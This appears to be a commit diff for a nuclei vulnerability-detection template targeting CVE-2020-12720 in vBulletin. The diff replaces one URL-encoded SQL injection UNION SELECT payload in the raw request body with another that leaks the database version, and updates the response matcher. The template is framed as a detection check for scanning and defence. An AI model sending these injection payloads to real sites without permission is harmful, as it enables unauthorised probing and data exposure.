updating CVE-2020-12720
parent
4eee21265b
commit
75e2166cc5
|
@ -8,6 +8,7 @@ info:
|
|||
# Source https://github.com/rekter0/exploits/tree/master/CVE-2020-12720
|
||||
# This template supports the detection part only.
|
||||
# Do not test any website without permission
|
||||
# https://github.com/swisskyrepo/nuclei-templates/blob/20179794c2030144ec85f0231a8d455b5d7e35c5/cves/CVE-2020-12720.yaml
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
@ -18,12 +19,10 @@ requests:
|
|||
Accept: */*
|
||||
Connection: keep-alive
|
||||
X-Requested-With: XMLHttpRequest
|
||||
Content-Length: 179
|
||||
Content-Length: 218
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
nodeId%5Bnodeid%5D=1+UNION+SELECT+26%2C25%2C24%2C23%2C22%2C21%2C20%2C19%2C20%2C17%2C16%2C15%2C14%2C13%2C12%2C11%2C10%2C%22vbulletinrcepoc%22%2C8%2C7%2C6%2C5%2C4%2C3%2C2%2C1%3B--+-
|
||||
|
||||
nodeId%5Bnodeid%5D=1%20union%20select%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2CCONCAT%28%27vbulletin%27%2C%27rce%27%2C%40%40version%29%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27--+-
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "vbulletinrcepoc"
|
||||
- "vbulletinrce"
|
||||
|
|
Loading…
Reference in New Issue